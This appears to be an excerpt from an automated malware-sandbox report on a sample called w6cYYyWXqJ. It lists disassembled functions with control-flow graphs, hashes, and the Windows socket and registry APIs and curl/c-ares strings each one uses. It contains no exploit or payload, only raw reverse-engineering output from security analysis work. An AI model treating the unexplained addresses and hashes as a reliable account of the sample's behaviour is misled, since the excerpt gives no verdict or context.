                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: EventSelect$EnumEventsNetwork
                                  • String ID: N=$multi.c
                                  • API String ID: 2170980988-1544942961
                                  • Opcode ID: be0bdef1a710286ac691153f47b568a5cb5a8e25a4196d3f22038863eb8a021a
                                  • Instruction ID: 3a2f04ad03dc8b5bb1c0ecb9a4c6e3ba58418141dc30a33d3a8ab09e86b99eb2
                                  • Opcode Fuzzy Hash: be0bdef1a710286ac691153f47b568a5cb5a8e25a4196d3f22038863eb8a021a
                                  • Instruction Fuzzy Hash: CCD1F3716083019FEB11DF64C881BABB7E5FF84358F44582DF898A7252E774E948CB92
                                  Function 00E96FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1798 e96fa0-e96fd2 1799 e96feb-e96ff1 1798->1799 1800 e96fd4-e96fd6 1798->1800 1802 e97324-e97330 1799->1802 1803 e96ff7-e96ff9 1799->1803 1801 e96fe0-e96fe4 1800->1801 1804 e9701b-e97041 1801->1804 1805 e96fe6-e96fe9 1801->1805 1806 e96fff-e97016 1803->1806 1807 e97186-e97196 1803->1807 1808 e97060-e97074 1804->1808 1805->1799 1805->1801 1806->1802 1807->1802 1809 e97057-e9705a 1808->1809 1810 e97076-e97081 1808->1810 1809->1808 1814 e97172-e97174 1809->1814 1810->1809 1813 e97083-e97089 1810->1813 1815 e9708b-e9708f 1813->1815 1816 e970dc-e970df 1813->1816 1817 e9719b-e971a8 1814->1817 1818 e97176-e97184 1814->1818 1821 e97091 1815->1821 1822 e970b0-e970bd 1815->1822 1823 e9712c-e97132 1816->1823 1824 e970e1-e970e5 1816->1824 1819 e971aa-e971be 1817->1819 1820 e971f1-e9722d call e9d7f0 select 1817->1820 1818->1820 1825 e9730d-e97310 1819->1825 1826 e971c4-e971c6 1819->1826 1848 e9730b 1820->1848 1849 e97233-e9723e 1820->1849 1827 e970a0-e970a7 1821->1827 1830 e970bf-e970ce 1822->1830 1831 e970d5 1822->1831 1823->1809 1828 e97138-e9713c 1823->1828 1832 e97100-e9710d 1824->1832 1833 e970e7 1824->1833 1825->1802 1842 e97312-e97322 1825->1842 1836 e971cc-e971e6 1826->1836 1837 e97331-e97344 1826->1837 1827->1822 1838 e970a9-e970ac 1827->1838 1839 e9714d-e9715a 1828->1839 1840 e9713e 1828->1840 1830->1831 1831->1816 1834 e9710f-e9711e 1832->1834 1835 e97125 1832->1835 1843 e970f0-e970f7 1833->1843 1834->1835 1835->1823 1836->1802 1858 e971ec 1836->1858 1837->1802 1857 e97346 1837->1857 1838->1827 1844 e970ae 1838->1844 1846 e97050 1839->1846 1847 e97160-e9716d 1839->1847 1845 e97140-e97144 1840->1845 1842->1802 1843->1832 1850 e970f9-e970fc 1843->1850 1844->1822 1845->1839 1853 e97146-e97149 1845->1853 1846->1809 1847->1846 1848->1825 1854 e9725c-e97269 1849->1854 1850->1843 1856 e970fe 1850->1856 1853->1845 1859 e9714b 1853->1859 1860 e9726b-e9727b __WSAFDIsSet 1854->1860 1861 e97253-e97256 1854->1861 1856->1832 1857->1842 1858->1842 1859->1839 1862 e9729a-e972ac __WSAFDIsSet 1860->1862 1863 e9727d-e97287 1860->1863 1861->1802 1861->1854 1866 e972ba-e972c9 __WSAFDIsSet 1862->1866 1867 e972ae-e972b3 1862->1867 1864 e97289 1863->1864 1865 e9728e-e97293 1863->1865 1864->1865 1865->1862 1868 e97295 1865->1868 1870 e972cf-e972f6 1866->1870 1871 e97240 1866->1871 1867->1866 1869 e972b5 1867->1869 1868->1862 1869->1866 1872 e972fc-e97306 1870->1872 1873 e97245-e9724c 1870->1873 1871->1873 1872->1873 1873->1861
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ccf081aedaf815e83ffd209d596cd967ffc5c9a97d8a8cb25783b4859b857a5
                                  • Instruction ID: 2534ed934ee7b22ab324a7e7ac0d9f414a3c00dc2ae9c4c7f7386b5324e452a5
                                  • Opcode Fuzzy Hash: 0ccf081aedaf815e83ffd209d596cd967ffc5c9a97d8a8cb25783b4859b857a5
                                  • Instruction Fuzzy Hash: EE91033062D3498BDB358B2988907FBB2D5EFC4368F14AB2CE8D8531D4EB749C48D681
                                  Function 00F4B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1874 f4b180-f4b195 1875 f4b3e0-f4b3e7 1874->1875 1876 f4b19b-f4b1a2 1874->1876 1877 f4b1b0-f4b1b9 1876->1877 1877->1877 1878 f4b1bb-f4b1bd 1877->1878 1878->1875 1879 f4b1c3-f4b1d0 1878->1879 1881 f4b1d6-f4b1f2 1879->1881 1882 f4b3db 1879->1882 1883 f4b229-f4b22d 1881->1883 1882->1875 1884 f4b233-f4b246 1883->1884 1885 f4b3e8-f4b417 1883->1885 1886 f4b260-f4b264 1884->1886 1887 f4b248-f4b24b 1884->1887 1893 f4b582-f4b589 1885->1893 1894 f4b41d-f4b429 1885->1894 1891 f4b269-f4b286 call f4af30 1886->1891 1888 f4b215-f4b223 1887->1888 1889 f4b24d-f4b256 1887->1889 1888->1883 1892 f4b315-f4b33c call 1208b00 1888->1892 1889->1891 1902 f4b2f0-f4b301 1891->1902 1903 f4b288-f4b2a3 call f4b060 1891->1903 1905 f4b342-f4b347 1892->1905 1906 f4b3bf-f4b3ca 1892->1906 1897 f4b435-f4b44c call f4b590 1894->1897 1898 f4b42b-f4b433 call f4b590 1894->1898 1914 f4b44e-f4b456 call f4b590 1897->1914 1915 f4b458-f4b471 call f4b590 1897->1915 1898->1897 1902->1888 1918 f4b307-f4b310 1902->1918 1921 f4b200-f4b213 call f4b020 1903->1921 1922 f4b2a9-f4b2c7 getsockname call f4b020 1903->1922 1911 f4b384-f4b38f 1905->1911 1912 f4b349-f4b358 1905->1912 1916 f4b3cc-f4b3d9 1906->1916 1911->1906 1920 f4b391-f4b3a5 1911->1920 1919 f4b360-f4b382 1912->1919 1914->1915 1930 f4b473-f4b487 1915->1930 1931 f4b48c-f4b4a7 1915->1931 1916->1875 1918->1916 1919->1911 1919->1919 1925 f4b3b0-f4b3bd 1920->1925 1921->1888 1932 f4b2cc-f4b2dd 1922->1932 1925->1906 1925->1925 1930->1893 1934 f4b4b3-f4b4cb call f4b660 1931->1934 1935 f4b4a9-f4b4b1 call f4b660 1931->1935 1932->1888 1936 f4b2e3 1932->1936 1941 f4b4cd-f4b4d5 call f4b660 1934->1941 1942 f4b4d9-f4b4f5 call f4b660 1934->1942 1935->1934 1936->1918 1941->1942 1947 f4b4f7-f4b50b 1942->1947 1948 f4b50d-f4b52b call f4b770 * 2 1942->1948 1947->1893 1948->1893 1953 f4b52d-f4b531 1948->1953 1954 f4b580 1953->1954 1955 f4b533-f4b53b 1953->1955 1954->1893 1956 f4b53d-f4b547 1955->1956 1957 f4b578-f4b57e 1955->1957 1956->1957 1958 f4b549-f4b54d 1956->1958 1957->1893 1958->1957 1959 f4b54f-f4b558 1958->1959 1959->1957 1960 f4b55a-f4b576 call f4b870 * 2 1959->1960 1960->1893 1960->1957
                                  APIs
                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 00F4B2B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                  • API String ID: 3358416759-2430778319
                                  • Opcode ID: 957e659f0a43300b63513fab746585699a070fad2c74557a5853f86892c30eb3
                                  • Instruction ID: 0f60fec6584a553dbcd695afe54d01f7d5daced0d59dd468eb4c7f3a78cd92a0
                                  • Opcode Fuzzy Hash: 957e659f0a43300b63513fab746585699a070fad2c74557a5853f86892c30eb3
                                  • Instruction Fuzzy Hash: CEC17E71A043159FD718DF24C880A6ABBE1FF88314F09896CEC498B3A6D735ED45EB81
                                  Function 00F4A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  APIs
                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00F3712E,?,?,?,00001001,00000000), ref: 00F4A90C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: recvfrom
                                  • String ID:
                                  • API String ID: 846543921-0
                                  • Opcode ID: c9d0f38a85fc87415b343313e8f7d2e8662429488f5481cb738b43ba9370fbce
                                  • Instruction ID: ce68de8ad467cf3b130506f1d574dbd797b8f41a934c10558f0a96f1121f266c
                                  • Opcode Fuzzy Hash: c9d0f38a85fc87415b343313e8f7d2e8662429488f5481cb738b43ba9370fbce
                                  • Instruction Fuzzy Hash: 76F06D76208308AFD2209E01DC44DBBBBEDEFC9764F05856DFD48232118270AE10DAB2
                                  Function 00F3A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F3AA19
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F3AA4C
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00F3AA97
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00F3AAE9
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00F3AB30
                                  • RegCloseKey.KERNELBASE(?), ref: 00F3AB6A
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00F3AB82
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00F3AC46
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00F3AD0A
                                  • RegEnumKeyExA.KERNELBASE ref: 00F3AD8D
                                  • RegCloseKey.KERNELBASE(?), ref: 00F3ADD9
                                  • RegEnumKeyExA.KERNELBASE ref: 00F3AE08
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00F3AE2A
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F3AE54
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00F3AF63
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00F3AFB2
                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00F3B072
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: QueryValue$Open$CloseEnum
                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                  • API String ID: 4217438148-1047472027
                                  • Opcode ID: 471ba5317456e87a715caac2e49058208858779770cad07c3c047a2dd769704d
                                  • Instruction ID: e4a1e444e8ad4b85e406fa46bc2f970d1547fbb02d2609e16ad54bdaa3d1519b
                                  • Opcode Fuzzy Hash: 471ba5317456e87a715caac2e49058208858779770cad07c3c047a2dd769704d
                                  • Instruction Fuzzy Hash: 7C72C0B1A04301AFE320DF25CC82B6B77E8AF95720F145828F985DB2A1E775E944DB53
                                  Function 00EBA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                  Download Yara Rule
                                  APIs
                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00EBA832
                                  Strings
                                  • cf_socket_open() -> %d, fd=%d, xrefs: 00EBA796
                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 00EBAE1F
                                  • Local port: %hu, xrefs: 00EBAF28
                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00EBAD0A
                                  • bind failed with errno %d: %s, xrefs: 00EBB080
                                  • Trying %s:%d..., xrefs: 00EBA7C2, 00EBA7DE
                                  • Could not set TCP_NODELAY: %s, xrefs: 00EBA871
                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00EBA6CE
                                  • Bind to local port %d failed, trying next, xrefs: 00EBAFE5
                                  • Local Interface %s is ip %s using address family %i, xrefs: 00EBAE60
                                  • cf-socket.c, xrefs: 00EBA5CD, 00EBA735
                                  • @, xrefs: 00EBA8F4
                                  • Trying [%s]:%d..., xrefs: 00EBA689
                                  • @, xrefs: 00EBAC42
                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 00EBADAC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                  • API String ID: 3981526788-2373386790
                                  • Opcode ID: b4849c75f6a3582802d73e1f7ce1cc53fc1abe100b1da10edecdd2116577dfb3
                                  • Instruction ID: c2ddb770eb6cd777231527431999cb3319c0e72f5bda45d0d2a65c13ea3ecf4f
                                  • Opcode Fuzzy Hash: b4849c75f6a3582802d73e1f7ce1cc53fc1abe100b1da10edecdd2116577dfb3
                                  • Instruction Fuzzy Hash: FC62F771508341ABEB21CF14D845BEBB7E4BF91318F08692DF98867292E771E845CB93
                                  Function 00F49740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 861 f49740-f4975b 862 f49780-f49782 861->862 863 f4975d-f49768 call f478a0 861->863 864 f49914-f4994e call 1208b70 RegOpenKeyExA 862->864 865 f49788-f497a0 call 1208e00 call f478a0 862->865 870 f4976e-f49770 863->870 871 f499bb-f499c0 863->871 878 f49950-f49955 864->878 879 f4995a-f49992 RegQueryValueExA RegCloseKey call 1208b98 864->879 865->871 874 f497a6-f497c5 865->874 870->874 875 f49772-f4977e 870->875 876 f49a0c-f49a15 871->876 885 f49827-f49833 874->885 886 f497c7-f497e0 874->886 875->865 878->876 887 f49997-f499b5 call f478a0 879->887 888 f49835-f4985c call f3e2b0 * 2 885->888 889 f4985f-f49872 call f45ca0 885->889 890 f497f6-f49809 886->890 891 f497e2-f497f3 call 1208b50 886->891 887->871 887->874 888->889 901 f499f0 889->901 902 f49878-f4987d call f477b0 889->902 890->885 900 f4980b-f49810 890->900 891->890 900->885 905 f49812-f49822 900->905 904 f499f5-f499fb call f45d00 901->904 909 f49882-f49889 902->909 915 f499fe-f49a09 904->915 905->876 909->904 914 f4988f-f4989b call f34fe0 909->914 914->901 920 f498a1-f498c3 call 1208b50 call f478a0 914->920 915->876 925 f499c2-f499ed call f3e2b0 * 2 920->925 926 f498c9-f498db call f3e2d0 920->926 925->901 926->925 930 f498e1-f498f0 call f3e2d0 926->930 930->925 936 f498f6-f49905 call f463f0 930->936 941 f49f66-f49f7f call f45d00 936->941 942 f4990b-f4990f 936->942 941->915 944 f49a3f-f49a5a call f46740 call f463f0 942->944 944->941 950 f49a60-f49a6e call f46d60 944->950 953 f49a70-f49a94 call f46200 call f467e0 call f46320 950->953 954 f49a1f-f49a39 call f46840 call f463f0 950->954 965 f49a16-f49a19 953->965 966 f49a96-f49ac6 call f3d120 953->966 954->941 954->944 965->954 967 f49fc1 965->967 971 f49ae1-f49af7 call f3d190 966->971 972 f49ac8-f49adb call f3d120 966->972 969 f49fc5-f49ffd call f45d00 call f3e2b0 * 2 967->969 969->915 971->954 979 f49afd-f49b09 call f34fe0 971->979 972->954 972->971 979->967 985 f49b0f-f49b29 call f3e730 979->985 991 f49f84-f49f88 985->991 992 f49b2f-f49b3a call f478a0 985->992 993 f49f95-f49f99 991->993 992->991 999 f49b40-f49b54 call f3e760 992->999 995 f49fa0-f49fb6 call f3ebf0 * 2 993->995 996 f49f9b-f49f9e 993->996 1008 f49fb7-f49fbe 995->1008 996->967 996->995 1004 f49f8a-f49f92 999->1004 1005 f49b5a-f49b6e call f3e730 999->1005 1004->993 1011 f49b70-f4a004 1005->1011 1012 f49b8c-f49b97 call f463f0 1005->1012 1008->967 1016 f4a015-f4a01d 1011->1016 1020 f49b9d-f49bbf call f46740 call f463f0 1012->1020 1021 f49c9a-f49cab call f3ea00 1012->1021 1018 f4a024-f4a045 call f3ebf0 * 2 1016->1018 1019 f4a01f-f4a022 1016->1019 1018->969 1019->969 1019->1018 1020->1021 1038 f49bc5-f49bda call f46d60 1020->1038 1028 f49f31-f49f35 1021->1028 1029 f49cb1-f49ccd call f3ea00 call f3e960 1021->1029 1034 f49f37-f49f3a 1028->1034 1035 f49f40-f49f61 call f3ebf0 * 2 1028->1035 1049 f49cfd-f49d0e call f3e960 1029->1049 1050 f49ccf 1029->1050 1034->954 1034->1035 1035->954 1038->1021 1048 f49be0-f49bf4 call f46200 call f467e0 1038->1048 1048->1021 1068 f49bfa-f49c0b call f46320 1048->1068 1058 f49d10 1049->1058 1059 f49d53-f49d55 1049->1059 1053 f49cd1-f49cec call f3e9f0 call f3e4a0 1050->1053 1070 f49d47-f49d51 1053->1070 1071 f49cee-f49cfb call f3e9d0 1053->1071 1063 f49d12-f49d2d call f3e9f0 call f3e4a0 1058->1063 1062 f49e69-f49e8e call f3ea40 call f3e440 1059->1062 1086 f49e94-f49eaa call f3e3c0 1062->1086 1087 f49e90-f49e92 1062->1087 1090 f49d2f-f49d3c call f3e9d0 1063->1090 1091 f49d5a-f49d6f call f3e960 1063->1091 1084 f49b75-f49b86 call f3ea00 1068->1084 1085 f49c11-f49c1c call f47b70 1068->1085 1075 f49dca-f49ddb call f3e960 1070->1075 1071->1049 1071->1053 1096 f49ddd-f49ddf 1075->1096 1097 f49e2e-f49e36 1075->1097 1084->1012 1106 f49f2d 1084->1106 1085->1012 1109 f49c22-f49c33 call f3e960 1085->1109 1116 f49eb0-f49eb1 1086->1116 